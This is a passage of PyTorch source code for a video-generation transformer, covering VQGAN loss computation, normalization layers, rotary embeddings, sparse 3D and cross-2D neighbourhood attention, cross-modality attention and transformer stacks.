of input image must be equal to {self.image_size}'\n assert channels == self.channels, 'number of channels on image or sketch is not equal to the channels set on this VQGanVAE'\n\n fmap, indices, commit_loss = self.encode(img)\n\n fmap = self.decode(fmap)\n\n if not return_loss and not return_discr_loss:\n return fmap\n\n assert return_loss ^ return_discr_loss, 'you should either return autoencoder loss or discriminator loss, but not both'\n\n # whether to return discriminator loss\n\n if return_discr_loss:\n assert exists(self.discr), 'discriminator must exist to train it'\n\n fmap.detach_()\n img.requires_grad_()\n\n fmap_discr_logits, img_discr_logits = map(self.discr, (fmap, img))\n\n gp = gradient_penalty(img, img_discr_logits)\n\n discr_loss = self.discr_loss(fmap_discr_logits, img_discr_logits)\n\n loss = discr_loss + gp\n\n if return_recons:\n return loss, fmap\n\n return loss\n\n # reconstruction loss\n\n recon_loss = self.recon_loss_fn(fmap, img)\n\n # early return if training on grayscale\n\n if not self.use_vgg_and_gan:\n if return_recons:\n return recon_loss, fmap\n\n return recon_loss\n\n # perceptual loss\n\n img_vgg_input = img\n fmap_vgg_input = fmap\n\n if img.shape[1] == 1:\n # handle grayscale for vgg\n img_vgg_input, fmap_vgg_input = map(lambda t: repeat(t, 'b 1 ... -> b c ...', c = 3), (img_vgg_input, fmap_vgg_input))\n\n img_vgg_feats = self.vgg(img_vgg_input)\n recon_vgg_feats = self.vgg(fmap_vgg_input)\n perceptual_loss = F.mse_loss(img_vgg_feats, recon_vgg_feats)\n\n # generator loss\n\n gen_loss = self.gen_loss(self.discr(fmap))\n\n # calculate adaptive weight\n\n last_dec_layer = self.decoders[-1].weight\n\n norm_grad_wrt_gen_loss = grad_layer_wrt_loss(gen_loss, last_dec_layer).norm(p = 2)\n norm_grad_wrt_perceptual_loss = grad_layer_wrt_loss(perceptual_loss, last_dec_layer).norm(p = 2)\n\n adaptive_weight = safe_div(norm_grad_wrt_perceptual_loss, norm_grad_wrt_gen_loss)\n adaptive_weight.clamp_(max = 1e4)\n\n # combine losses\n\n loss = recon_loss + perceptual_loss + commit_loss + adaptive_weight * gen_loss\n\n if return_recons:\n return loss, fmap\n\n return loss\n\n# normalizations\n\nclass StableLayerNorm(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.norm = nn.LayerNorm(dim)\n\n def forward(self, x):\n x = x / x.amax(dim = -1, keepdim = True).detach()\n return self.norm(x)\n\nclass PreNorm(nn.Module):\n def __init__(\n self,\n *,\n dim,\n fn\n ):\n super().__init__()\n self.norm = nn.LayerNorm(dim)\n self.fn = fn\n\n def forward(self, x, **kwargs):\n x = self.norm(x)\n return self.fn(x, **kwargs)\n\nclass SandwichNorm(nn.Module):\n def __init__(\n self,\n *,\n dim,\n fn\n ):\n super().__init__()\n self.prenorm = nn.LayerNorm(dim)\n self.postnorm = nn.LayerNorm(dim)\n self.fn = fn\n\n def forward(self, x, **kwargs):\n x = self.prenorm(x)\n x = self.fn(x, **kwargs)\n x = self.postnorm(x)\n return x\n\n# relative positional embedding (rotary)\n\nclass RotaryEmbedding(nn.Module):\n def __init__(self, dim):\n super().__init__()\n inv_freq = 1. / (10000 ** (torch.arange(0, dim, 2).float() / dim))\n self.register_buffer('inv_freq', inv_freq)\n\n def forward(self, seq_len, device):\n inv_freq = self.inv_freq\n t = torch.arange(seq_len, device = device).type_as(inv_freq)\n freqs = torch.einsum('i , j -> i j', t, inv_freq)\n return torch.cat((freqs, freqs), dim = -1)\n\ndef rotate_half(x):\n x = rearrange(x, '... (j d) -> ... j d', j = 2)\n x1, x2 = x.unbind(dim = -2)\n return torch.cat((-x2, x1), dim = -1)\n\ndef apply_rotary_pos_emb(freqs, t):\n rot_dim = freqs.shape[-1]\n t, t_pass = t[..., :rot_dim], t[..., rot_dim:]\n t = (t * freqs.cos()) + (rotate_half(t) * freqs.sin())\n return torch.cat((t, t_pass), dim = -1)\n\n# helper classes\n\nclass ShiftVideoTokens(nn.Module):\n def __init__(\n self,\n fn,\n image_size,\n shift_space = True,\n shift_time = False\n ):\n super().__init__()\n self.fn = fn\n self.image_size = image_size\n\n self.shift_time = shift_time\n self.shift_space = shift_space\n\n def forward(self, x, **kwargs):\n\n if not self.shift_time and not self.shift_space:\n return self.fn(x, **kwargs)\n\n image_size = self.image_size\n img_seq_len = image_size ** 2\n\n x_bos, x_video = x[:, :1], x[:, 1:]\n n = x_video.shape[1]\n\n # pad to nearest frame\n\n padding = img_seq_len - (n % img_seq_len)\n x_video = F.pad(x_video, (0, 0, 0, padding), value = 0.)\n\n # reshape to video\n\n x_video = rearrange(x_video, 'b (f h w) d -> b f h w d', h = image_size, w = image_size)\n\n x_image_h = x_image_w = x_frame = None\n\n # chunk depending on whether shifting time, space, or both\n\n if self.shift_space and self.shift_time:\n x_frame, x_image_h, x_image_w, *x_rest = x_video.chunk(5, dim = -1)\n elif self.shift_space:\n x_image_h, x_image_w, *x_rest = x_video.chunk(4, dim = -1)\n elif self.shift_time:\n x_frame, *x_rest = x_video.chunk(3, dim = -1)\n\n # shifts\n\n if self.shift_space:\n x_image_h = F.pad(x_image_h, (0, 0, 0, 0, 1, -1))\n x_image_w = F.pad(x_image_w, (0, 0, 1, -1))\n\n if self.shift_time:\n x_frame = F.pad(x_frame, (0, 0, 0, 0, 0, 0, 1, -1))\n\n # concat\n\n x_shifted = [x_frame, x_image_h, x_image_w, *x_rest]\n x_shifted = list(filter(exists, x_shifted))\n\n x_video = torch.cat(x_shifted, dim = -1)\n\n # merge text and image sequence back together\n\n x_video = rearrange(x_video, 'b f h w d -> b (f h w) d')\n x_video = x_video[:, :n]\n\n x = torch.cat((x_bos, x_video), dim = 1)\n return self.fn(x, **kwargs)\n\nclass GEGLU(nn.Module):\n def forward(self, x):\n x, gate = x.chunk(2, dim = -1)\n return x * F.gelu(gate)\n\nclass FeedForward(nn.Module):\n def __init__(\n self,\n *,\n dim,\n mult = 4,\n dropout = 0.,\n chunk_size = None, # chunk size to process feedforward, along sequence length, from Reformer paper. None means do not chunk\n ):\n super().__init__()\n inner_dim = (dim * mult * 2) // 3\n self.chunk_size = chunk_size\n\n self.net = nn.Sequential(\n nn.Linear(dim, inner_dim * 2),\n GEGLU(),\n nn.Dropout(dropout),\n nn.Linear(inner_dim, dim)\n )\n\n def forward(self, x):\n if not exists(self.chunk_size):\n return self.net(x)\n\n x_chunks = x.split(self.chunk_size, dim = -2)\n out_chunks = [self.net(c) for c in x_chunks]\n return torch.cat(out_chunks, dim = -2)\n\n# attention classes\n\nclass Attention(nn.Module):\n def __init__(\n self,\n *,\n dim,\n heads = 8,\n dim_head = 64,\n causal = False,\n dropout = 0.\n ):\n super().__init__()\n inner_dim = heads * dim_head\n self.heads = heads\n self.causal = causal\n self.scale = dim_head ** -0.5\n\n self.null_k = nn.Parameter(torch.randn(heads, 1, dim_head))\n self.null_v = nn.Parameter(torch.randn(heads, 1, dim_head))\n\n self.talking_heads = nn.Conv2d(heads, heads, 1, bias = False)\n self.dropout = nn.Dropout(dropout)\n self.to_q = nn.Linear(dim, inner_dim, bias = False)\n self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False)\n self.to_out = nn.Linear(inner_dim, dim)\n\n def forward(\n self,\n x,\n mask = None,\n context = None,\n context_mask = None,\n rotary_pos_emb = None\n ):\n b, h, device = x.shape[0], self.heads, x.device\n\n has_context = exists(context)\n kv_input = context if has_context else x\n\n qkv = (self.to_q(x), *self.to_kv(kv_input).chunk(2, dim = -1))\n q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv)\n\n # add rotary positional embedding, if exists\n\n if not has_context and exists(rotary_pos_emb):\n apply_rotary = partial(apply_rotary_pos_emb, rotary_pos_emb)\n q, k, v = map(apply_rotary, (q, k, v))\n\n # add null key / values, needed for condition dropout\n\n null_k = repeat(self.null_k, 'h 1 d -> b h 1 d', b = b)\n null_v = repeat(self.null_v, 'h 1 d -> b h 1 d', b = b)\n\n k = torch.cat((null_k, k), dim = -2)\n v = torch.cat((null_v, v), dim = -2)\n\n # scale\n\n q = q * self.scale\n\n # similarity\n\n sim = einsum('b h i d, b h j d -> b h i j', q, k)\n\n # masking\n\n mask_value = -torch.finfo(x.dtype).max\n\n key_mask = mask if not has_context else context_mask\n\n if exists(key_mask):\n key_mask = F.pad(key_mask, (1, 0), value = True) # always pay attention to null key / value\n key_mask = rearrange(key_mask, 'b j -> b 1 1 j')\n sim = sim.masked_fill(~key_mask, mask_value)\n\n if self.causal:\n i, j = sim.shape[-2:]\n mask = torch.ones(i, j, device = device, dtype = torch.bool).triu_(j - i + 1)\n sim = sim.masked_fill(mask, mask_value)\n\n # attention\n\n attn = stable_softmax(sim, dim = -1)\n attn = self.talking_heads(attn)\n attn = self.dropout(attn)\n\n # aggregate, merge, and combine heads\n\n out = einsum('b h i j, b h j d -> b h i d', attn, v)\n out = rearrange(out, 'b h n d -> b n (h d)')\n return self.to_out(out)\n\nclass Sparse3DNA(nn.Module):\n def __init__(\n self,\n dim,\n video_shape,\n kernel_size = 3,\n dilation = 1,\n heads = 8,\n dim_head = 64,\n dropout = 0.,\n causal = False,\n query_num_frames_chunk = None\n ):\n super().__init__()\n inner_dim = dim_head * heads\n self.heads = heads\n self.scale = dim_head ** -0.5\n\n self.dropout = nn.Dropout(dropout)\n self.to_q = nn.Linear(dim, inner_dim, bias = False)\n self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False)\n\n self.talking_heads = nn.Conv2d(heads, heads, 1, bias = False)\n self.to_out = nn.Linear(inner_dim, dim)\n\n self.dilation = cast_tuple(dilation, size = 3)\n\n self.kernel_size = cast_tuple(kernel_size, size = 3)\n assert all(map(lambda n: n % 2 == 1, self.kernel_size)), 'kernel size must be odd'\n\n self.kernel_numel = self.kernel_size[0] * self.kernel_size[1] * self.kernel_size[2]\n\n # calculate padding\n\n self.padding_frame = calc_same_padding(self.kernel_size[0], self.dilation[0])\n self.padding_height = calc_same_padding(self.kernel_size[1], self.dilation[1])\n self.padding_width = calc_same_padding(self.kernel_size[2], self.dilation[2])\n\n self.video_padding = (self.padding_width, self.padding_width, self.padding_height, self.padding_height, self.padding_frame, self.padding_frame)\n\n # save video shape and calculate max number of tokens\n\n self.video_shape = video_shape\n max_frames, fmap_size, _ = video_shape\n max_num_tokens = torch.empty(video_shape).numel()\n self.max_num_tokens = max_num_tokens\n\n # how many query tokens to process at once to limit peak memory usage, by multiple of frame tokens (fmap_size ** 2)\n\n self.query_num_frames_chunk = default(query_num_frames_chunk, max_frames)\n\n # precalculate causal mask\n\n indices = torch.arange(max_num_tokens)\n shaped_indices = rearrange(indices, '(f h w) -> 1 1 f h w', f = max_frames, h = fmap_size, w = fmap_size)\n padded_indices = F.pad(shaped_indices, self.video_padding, value = max_num_tokens) # padding has value of max tokens so to be masked out\n unfolded_indices = unfoldNd(padded_indices, kernel_size = self.kernel_size, dilation = self.dilation)\n unfolded_indices = rearrange(unfolded_indices, '1 k n -> n k')\n\n # if causal, compare query and key indices and make sure past cannot see future\n # if not causal, just mask out the padding\n\n if causal:\n mask = rearrange(indices, 'n -> n 1') < unfolded_indices\n else:\n mask = unfolded_indices == max_num_tokens\n\n mask = F.pad(mask, (1, 0), value = False) # bos tokens never get masked out\n self.register_buffer('mask', mask)\n\n def forward(self, x, **kwargs):\n b, n, _, h, device = *x.shape, self.heads, x.device\n\n # more variables\n\n dilation = self.dilation\n kernel_size = self.kernel_size\n video_padding = self.video_padding\n fmap_size = self.video_shape[1]\n\n bos_only = n == 1\n tokens_per_frame = fmap_size ** 2\n\n padding = 0 if bos_only else (tokens_per_frame - (n - 1) % tokens_per_frame)\n num_frames = (n + padding) // tokens_per_frame\n\n # pad for last token in video\n\n padded_x = F.pad(x, (0, 0, 0, padding), value = 0.) if padding > 0 else x\n\n # derive queries / keys / values\n\n q, k, v = (self.to_q(x), *self.to_kv(padded_x).chunk(2, dim = -1))\n\n # early return if <bos>\n\n if bos_only:\n return self.to_out(v)\n\n # split out heads\n\n q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> (b h) n d', h = h), (q, k, v))\n\n # scale queries\n\n q = q * self.scale\n\n # take care of bos\n\n q = q[:, 1:]\n bos_value = v[:, :1]\n\n # compute keys and values\n\n (k_bos, k), (v_bos, v) = map(lambda t: (t[:, :1], t[:, 1:]), (k, v))\n\n # reshape keys and values to video and add appropriate padding along all dimensions (frames, height, width)\n\n k, v = map(lambda t: rearrange(t, 'b (f h w) d -> b d f h w', f = num_frames, h = fmap_size), (k, v))\n k, v = map(lambda t: F.pad(t, video_padding), (k, v))\n\n # put the attention processing code in a function\n # to allow for processing queries in chunks of frames\n\n out = []\n\n def attend(q, k, v, mask, k_bos, v_bos, kernel_size):\n chunk_length = q.shape[1]\n\n k, v = map(lambda t: unfoldNd(t, kernel_size = kernel_size, dilation = dilation), (k, v))\n k, v = map(lambda t: rearrange(t, 'b (d j) i -> b i j d', j = self.kernel_numel), (k, v))\n k, v = map(lambda t: t[:, :chunk_length], (k, v))\n\n # append bos keys and values\n\n k_bos, v_bos = map(lambda t: repeat(t, 'b 1 d -> b n 1 d', n = k.shape[1]), (k_bos, v_bos))\n k = torch.cat((k_bos, k), dim = 2)\n v = torch.cat((v_bos, v), dim = 2)\n\n # calculate sim\n\n sim = einsum('b i d, b i j d -> b i j', q, k)\n\n # causal mask\n\n if exists(mask):\n mask_value = -torch.finfo(sim.dtype).max\n mask = rearrange(mask, 'i j -> 1 i j')\n sim = sim.masked_fill(mask, mask_value)\n\n # attention\n\n attn = stable_softmax(sim, dim = -1)\n\n attn = rearrange(attn, '(b h) ... -> b h ...', h = h)\n attn = self.talking_heads(attn)\n attn = rearrange(attn, 'b h ... -> (b h) ...')\n\n attn = self.dropout(attn)\n\n # aggregate values\n\n return einsum('b i j, b i j d -> b i d', attn, v)\n\n # process queries in chunks\n\n frames_per_chunk = min(self.query_num_frames_chunk, num_frames)\n chunk_size = frames_per_chunk * tokens_per_frame\n\n q_chunks = q.split(chunk_size, dim = 1)\n\n mask = self.mask[:(n - 1)]\n mask_chunks = mask.split(chunk_size, dim = 0)\n\n for ind, (q_chunk, mask_chunk) in enumerate(zip(q_chunks, mask_chunks)):\n q_chunk = q_chunks[ind]\n mask_chunk = mask_chunks[ind]\n\n # slice the keys and values to the appropriate frames, accounting for padding along frames dimension\n\n kv_start_pos = ind * frames_per_chunk\n kv_end_pos = kv_start_pos + (ind + frames_per_chunk + self.padding_frame * 2)\n kv_frame_range = slice(kv_start_pos, kv_end_pos)\n\n k_slice, v_slice = map(lambda t: t[:, :, kv_frame_range], (k, v))\n\n # calculate output chunk\n\n out_chunk = attend(\n q = q_chunk,\n k = k_slice,\n v = v_slice,\n mask = mask_chunk,\n k_bos = k_bos,\n v_bos = v_bos,\n kernel_size = kernel_size,\n )\n\n out.append(out_chunk)\n\n # combine all chunks\n\n out = torch.cat(out, dim = 1)\n\n # append bos value\n\n out = torch.cat((bos_value, out), dim = 1) # bos will always adopt its own value, since it pays attention only to itself\n\n # merge heads\n\n out = rearrange(out, '(b h) n d -> b n (h d)', h = h)\n return self.to_out(out)\n\nclass SparseCross2DNA(nn.Module):\n def __init__(\n self,\n *,\n dim,\n image_size,\n heads = 8,\n dim_head = 64,\n dropout = 0.,\n kernel_size = 3,\n dilation = 1,\n ):\n super().__init__()\n inner_dim = heads * dim_head\n self.heads = heads\n self.scale = dim_head ** -0.5\n\n self.null_k = nn.Parameter(torch.randn(heads, 1, dim_head))\n self.null_v = nn.Parameter(torch.randn(heads, 1, dim_head))\n\n self.talking_heads = nn.Conv3d(heads, heads, 1, bias = False)\n self.dropout = nn.Dropout(dropout)\n self.to_q = nn.Linear(dim, inner_dim, bias = False)\n self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False)\n self.to_out = nn.Linear(inner_dim, dim)\n\n # handle variables for 2d unfold\n\n self.image_size = image_size\n self.kernel_size = kernel_size\n self.dilation = dilation\n self.padding = calc_same_padding(kernel_size, dilation)\n\n def forward(\n self,\n x,\n *,\n context,\n context_mask = None,\n **kwargs\n ):\n b, n, h, device = x.shape[0], x.shape[1], self.heads, x.device\n\n fmap_size, kernel_size, dilation, padding = self.image_size, self.kernel_size, self.dilation, self.padding\n\n context_len = context.shape[-2]\n tokens_per_frame = fmap_size * fmap_size\n kernel_numel = kernel_size * kernel_size\n\n # always have context mask avaiable\n\n if not exists(context_mask):\n context_mask = torch.ones((b, context_len), dtype = torch.bool, device = device)\n\n mask_value = -torch.finfo(x.dtype).max\n\n # derive queries, keys, values\n\n qkv = (self.to_q(x), *self.to_kv(context).chunk(2, dim = -1))\n q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv)\n\n # scale\n\n q = q * self.scale\n\n # handle bos\n\n q_bos, q = q[:, :, 0], q[:, :, 1:]\n\n null_k_for_bos = repeat(self.null_k, 'h 1 d -> b h 1 d', b = b)\n null_v_for_bos = repeat(self.null_v, 'h 1 d -> b h 1 d', b = b)\n\n k_for_bos = torch.cat((null_k_for_bos, k), dim = -2)\n v_for_bos = torch.cat((null_v_for_bos, v), dim = -2)\n\n sim_bos = einsum('b h d, b h j d -> b h j', q_bos, k_for_bos)\n\n bos_context_mask = rearrange(context_mask, 'b j -> b 1 j')\n bos_context_mask = F.pad(bos_context_mask, (1, 0), value = True)\n sim_bos = sim_bos.masked_fill(~bos_context_mask, mask_value)\n\n attn_bos = stable_softmax(sim_bos, dim = -1)\n out_bos = einsum('b h j, b h j d -> b h d', attn_bos, v_for_bos)\n out_bos = rearrange(out_bos, 'b h d -> b 1 (h d)')\n\n # early return if only bos token\n\n if n == 1:\n return self.to_out(out_bos)\n\n # reshape key / values to be unfolded\n\n k, v = map(lambda t: rearrange(t, 'b h (f x y) d -> (b h f) d x y', x = fmap_size, y = fmap_size), (k, v))\n k, v = map(lambda t: F.unfold(t, kernel_size = kernel_size, dilation = dilation, padding = padding), (k, v))\n k, v = map(lambda t: rearrange(t, '(b h f) (d j) i -> b h i (f j) d', b = b, h = h, j = kernel_numel), (k, v))\n\n # add null key / values, needed for condition dropout\n\n null_k = repeat(self.null_k, 'h 1 d -> b h i 1 d', b = b, i = tokens_per_frame)\n null_v = repeat(self.null_v, 'h 1 d -> b h i 1 d', b = b, i = tokens_per_frame)\n\n k = torch.cat((null_k, k), dim = -2)\n v = torch.cat((null_v, v), dim = -2)\n\n # pad queries to nearest frame\n\n q_remainder = q.shape[-2] % tokens_per_frame\n q_padding = 0 if q_remainder == 0 else (tokens_per_frame - q_remainder)\n q = F.pad(q, (0, 0, 0, q_padding), value = 0.)\n\n # similarity\n\n q = rearrange(q, 'b h (f i) d -> b h f i d', i = tokens_per_frame)\n\n sim = einsum('b h f i d, b h i j d -> b h f i j', q, k)\n\n # masking\n\n context_mask = rearrange(context_mask, 'b (f x y) -> (b f) 1 x y', x = fmap_size, y = fmap_size)\n context_mask = F.unfold(context_mask.float(), kernel_size = kernel_size, dilation = dilation, padding = padding)\n context_mask = context_mask == 1.\n context_mask = rearrange(context_mask, '(b f) j i -> b 1 1 i (f j)', b = b, j = kernel_numel)\n context_mask = F.pad(context_mask, (1, 0), value = True) # always pay attention to null key / value\n\n sim = sim.masked_fill(~context_mask, mask_value)\n\n # attention\n\n attn = stable_softmax(sim, dim = -1)\n attn = self.talking_heads(attn)\n attn = self.dropout(attn)\n\n # aggregate, merge, and combine heads\n\n out = einsum('b h f i j, b h i j d -> b h f i d', attn, v)\n out = rearrange(out, 'b h f n d -> b (f n) (h d)')\n\n # add output for bos back\n\n out = torch.cat((out_bos, out), dim = 1)\n\n return self.to_out(out[:, :n])\n\n\"\"\"\nFor efficient audio <-> video attention\nLargely inspired by chunk cross attention from https://arxiv.org/abs/2112.04426\n\"\"\"\n\ndef padding_to_multiple_of(n, mult):\n remainder = n % mult\n if remainder == 0:\n return 0\n return mult - remainder\n\nclass CrossModalityCrossAttention(nn.Module):\n def __init__(\n self,\n *,\n dim,\n chunk_size,\n context_chunk_size,\n heads = 8,\n dim_head = 64,\n context_dim = None,\n has_start_token = True,\n context_has_start_token = True,\n norm = False,\n norm_context = False,\n dropout = 0.\n ):\n super().__init__()\n context_dim = default(context_dim, dim)\n\n self.heads = heads\n self.scale = dim_head ** -0.5\n inner_dim = dim_head * heads\n\n self.norm = nn.LayerNorm(dim) if norm else nn.Identity()\n self.context_norm = nn.LayerNorm(context_dim) if norm_context else nn.Identity()\n\n self.to_q = nn.Linear(dim, inner_dim, bias = False)\n self.to_kv = nn.Linear(context_dim, inner_dim * 2, bias = False)\n self.to_out = nn.Linear(inner_dim, dim)\n\n self.null_k = nn.Parameter(torch.randn(heads, dim_head))\n self.null_v = nn.Parameter(torch.randn(heads, dim_head))\n\n self.talking_heads = nn.Conv3d(heads, heads, 1)\n self.dropout = nn.Dropout(dropout)\n\n self.has_start_token = has_start_token\n self.context_has_start_token = context_has_start_token\n\n self.chunk_size = chunk_size\n self.context_chunk_size = context_chunk_size\n\n def forward(\n self,\n seq,\n context,\n mask = None,\n context_mask = None\n ):\n seq_shape, device = seq.shape, seq.device\n\n # get lengths of sequence and context, excluding start token\n\n seq_len = seq.shape[-2] - (1 if self.has_start_token else 0)\n context_len = context.shape[-2] - (1 if self.context_has_start_token else 0)\n\n # determine padding\n # depending on whether start token exists\n\n seq_left_pad = -1 if self.has_start_token else 0\n seq_right_pad = padding_to_multiple_of(seq_len, self.chunk_size)\n\n seq_out_left_pad = -seq_left_pad\n seq_out_right_pad = -seq_right_pad\n\n context_left_pad = self.context_chunk_size - (1 if self.context_chunk_size else 0)\n context_right_pad = padding_to_multiple_of(context_len, self.context_chunk_size)\n\n # do actual padding so divisible by chunk size (video frame)\n\n seq = F.pad(seq, (0, 0, seq_left_pad, seq_right_pad), value = 0.)\n context = F.pad(context, (0, 0, context_left_pad, context_right_pad), value = 0.)\n\n if exists(context_mask):\n context_mask = F.pad(context_mask, (context_left_pad, context_right_pad), value = False)\n\n # break into chunks\n\n \"\"\"\n b - batch\n n - num chunks\n c - chunks\n d - feature dimension\n h - heads\n \"\"\"\n\n seq = rearrange(seq, 'b (n c) d -> b n c d', c = self.chunk_size)\n context = rearrange(context, 'b (n c) d -> b n c d', c = self.context_chunk_size)\n\n if exists(context_mask):\n context_mask = rearrange(context_mask, 'b (n c) -> b n c', c = self.context_chunk_size)\n\n # determine if sequence is longer than context, or vice versa, when aligned for time\n\n seq_num_chunks = seq.shape[-3]\n context_num_chunks = context.shape[-3]\n\n if seq_num_chunks <= context_num_chunks:\n context = context[:, :seq_num_chunks]\n\n if exists(context_mask):\n context_mask = context_mask[:, :seq_num_chunks]\n else:\n # handle the case where the sequence has more chunks\n # in which case the sequence is curtailed, and output of attention is 0 for the excised right portion\n\n seq = seq[:, :context_num_chunks]\n seq_out_right_pad += self.chunk_size * (seq_num_chunks - context_num_chunks)\n\n # early exit if nothing to attend to\n\n if context.shape[1] == 0:\n return torch.zeros(seq_shape, device = device)\n\n # pre layernorm\n\n seq = self.norm(seq)\n context = self.context_norm(context)\n\n # attention time!\n\n q = self.to_q(seq)\n k, v = self.to_kv(context).chunk(2, dim = -1)\n\n q, k, v = map(lambda t: rearrange(t, 'b n c (h d) -> b h n c d', h = self.heads), (q, k, v))\n q = q * self.scale\n\n null_k, null_v = map(lambda t: repeat(t, 'h d -> b h n 1 d', b = q.shape[0], n = q.shape[2]), (self.null_k, self.null_v))\n\n k = torch.cat((null_k, k), dim = -2)\n v = torch.cat((null_v, v), dim = -2)\n\n sim = einsum('b h n i d, b h n j d -> b h n i j', q, k)\n\n if exists(context_mask):\n max_neg_value = -torch.finfo(sim.dtype).max\n context_mask = rearrange(context_mask, 'b n c -> b 1 n 1 c')\n context_mask = F.pad(context_mask, (1, 0), value = True) # null key / value\n sim = sim.masked_fill(~context_mask, max_neg_value)\n\n attn = stable_softmax(sim, dim = -1)\n attn = self.dropout(attn)\n\n attn = self.talking_heads(attn)\n\n out = einsum('b h n i j, b h n j d -> b h n i d', attn, v)\n out = rearrange(out, 'b h n c d -> b (n c) (h d)')\n out = self.to_out(out)\n\n # shift back to original sequence\n\n out = F.pad(out, (0, 0, seq_out_left_pad, seq_out_right_pad), value = 0.)\n\n # mask src sequence, if mask was passed in (extra insurance)\n\n if exists(mask):\n mask = rearrange(mask, '... -> ... 1')\n out = out.masked_fill(~mask, 0.)\n\n return out\n\n# transformer\n\nclass Transformer(nn.Module):\n def __init__(\n self,\n *,\n dim,\n depth,\n causal = False,\n heads = 8,\n dim_head = 64,\n ff_mult = 4,\n cross_attend = False,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n cross_2dna_attn = False,\n cross_2dna_image_size = None,\n cross_2dna_kernel_size = 3,\n cross_2dna_dilations = (1,),\n sparse_3dna_attn = False,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_video_shape = None,\n sparse_3dna_query_num_frames_chunk = None,\n sparse_3dna_dilations = (1,),\n shift_video_tokens = False,\n rotary_pos_emb = False\n ):\n super().__init__()\n assert not (sparse_3dna_attn and not exists(sparse_3dna_video_shape)), 'sparse_3dna_video_shape must be defined if turned on'\n assert not (cross_2dna_attn and not exists(cross_2dna_image_size)), 'cross_2dna_image_size must be defined'\n\n self.layers = MList([])\n\n for ind in range(depth):\n if sparse_3dna_attn:\n dilation = sparse_3dna_dilations[ind % len(sparse_3dna_dilations)]\n\n self_attn = Sparse3DNA(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = causal,\n kernel_size = sparse_3dna_kernel_size,\n dilation = dilation,\n video_shape = sparse_3dna_video_shape,\n query_num_frames_chunk = sparse_3dna_query_num_frames_chunk\n )\n else:\n self_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = causal,\n dropout = attn_dropout\n )\n\n cross_attn = None\n\n if cross_attend:\n if cross_2dna_attn:\n dilation = cross_2dna_dilations[ind % len(cross_2dna_dilations)]\n\n cross_attn = SparseCross2DNA(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout,\n image_size = cross_2dna_image_size,\n kernel_size = cross_2dna_kernel_size,\n dilation = dilation\n )\n\n else:\n cross_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout\n )\n\n ff = FeedForward(dim = dim, mult = ff_mult, dropout = ff_dropout, chunk_size = ff_chunk_size)\n\n if sparse_3dna_attn and shift_video_tokens:\n fmap_size = sparse_3dna_video_shape[-1]\n self_attn = ShiftVideoTokens(self_attn, image_size = fmap_size)\n ff = ShiftVideoTokens(ff, image_size = fmap_size)\n\n self.layers.append(MList([\n SandwichNorm(dim = dim, fn = self_attn),\n SandwichNorm(dim = dim, fn = cross_attn) if cross_attend else None,\n SandwichNorm(dim = dim, fn = ff)\n ]))\n\n self.norm = StableLayerNorm(dim)\n\n def forward(\n self,\n x,\n mask = None,\n context = None,\n context_mask = None\n ):\n for attn, cross_attn, ff in self.layers:\n x = attn(x, mask = mask) + x\n\n if exists(cross_attn):\n x = cross_attn(x, context = context, mask = mask, context_mask = context_mask) + x\n\n x = ff(x) + x\n\n return self.norm(x)\n\nclass ReversibleTransformer(nn.Module):\n def __init__(\n self,\n *,\n dim,\n depth,\n causal = False,\n heads = 8,\n dim_head = 64,\n ff_mult = 4,\n cross_attend = False,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n cross_2dna_attn = False,\n cross_2dna_image_size = None,\n cross_2dna_kernel_size = 3,\n cross_2dna_dilations = (1,),\n sparse_3dna_attn = False,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_video_shape = None,\n sparse_3dna_query_num_frames_chunk = None,\n sparse_3dna_dilations = (1,),\n shift_video_tokens = False,\n rotary_pos_emb = False\n ):\n super().__init__()\n assert not (sparse_3dna_attn and not exists(sparse_3dna_video_shape)), 'sparse_3dna_video_shape must be defined if turned on'\n assert not (cross_2dna_attn and not exists(cross_2dna_image_size)), 'cross_2dna_image_size must be defined'\n\n self.layers = MList([])\n\n for ind in range(depth):\n if sparse_3dna_attn:\n dilation = sparse_3dna_dilations[ind % len(sparse_3dna_dilations)]\n image_size = sparse_3dna_video_shape[-1]\n\n self_attn = Sparse3DNA(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = causal,\n kernel_size = sparse_3dna_kernel_size,\n dilation = dilation,\n video_shape = sparse_3dna_video_shape,\n query_num_frames_chunk = sparse_3dna_query_num_frames_chunk\n )\n else:\n image_size = None\n\n self_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = causal,\n dropout = attn_dropout\n )\n\n wrapper_fn = partial(ShiftVideoTokens, image_size = image_size, shift_space = sparse_3dna_attn and shift_video_tokens)\n\n self.layers.append(MList([\n SandwichNorm(dim = dim, fn = wrapper_fn(self_attn)),\n SandwichNorm(dim = dim, fn = wrapper_fn(FeedForward(dim = dim, mult = ff_mult, dropout = ff_dropout, chunk_size = ff_chunk_size)))\n ]))\n\n if not cross_attend:\n continue\n\n if cross_2dna_attn:\n dilation = cross_2dna_dilations[ind % len(cross_2dna_dilations)]\n\n cross_attn = SparseCross2DNA(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout,\n image_size = cross_2dna_image_size,\n kernel_size = cross_2dna_kernel_size,\n dilation = dilation\n )\n else:\n cross_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout\n )\n\n self.layers.append(MList([\n SandwichNorm(dim = dim, fn = cross_attn),\n SandwichNorm(dim = dim, fn = wrapper_fn(FeedForward(dim = dim, mult = ff_mult, dropout = ff_dropout, chunk_size = ff_chunk_size)))\n ]))\n\n attn_context_layer = ((True, False),) if cross_attend else tuple()\n route_attn = ((True, False), *attn_context_layer) * depth\n route_context = ((False, 